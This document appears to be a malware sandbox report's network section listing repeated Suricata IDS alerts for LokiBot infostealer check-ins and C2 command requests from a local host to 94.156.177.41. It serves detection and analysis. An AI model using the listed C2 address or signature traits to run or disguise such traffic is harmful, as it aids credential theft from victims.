Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51255 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51255 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51321 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51321 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51255 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51255 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51262 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51262 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51254 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49732 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51262 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51262 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51260 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49744 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51459 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51459 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51459 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51459 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51459 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51236 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51474 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51474 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51474 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51474 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51474 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51233 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51406 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51233 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51233 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51406 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51406 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51233 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51233 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51497 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51497 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51497 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51406 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51406 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51252 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51433 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51433 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51433 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51433 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51497 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51433 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51497 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51248 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51248 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51248 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51244 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51248 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51244 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51244 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51446 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51446 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51446 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49728 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51230 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51244 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51244 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51446 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51248 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51446 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51247 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51247 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51247 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51264 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51264 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51264 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51247 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51247 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51521 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51521 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51427 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51264 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51521 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51264 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51235 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51521 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51427 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51309 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51309 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51309 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51521 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51309 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51261 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51531 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51509 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51427 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51531 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51531 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51427 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51509 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51509 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51427 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51309 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51531 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51531 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51315 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51315 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51315 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51509 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51509 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51250 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51544 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51544 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51544 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51544 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51544 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51454 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49718 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51454 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51454 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51550 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51550 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51550 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51315 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51315 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51550 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51550 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51454 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51454 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51245 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51245 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51245 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51245 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51245 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51581 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51581 -> 94.156.177.41:80
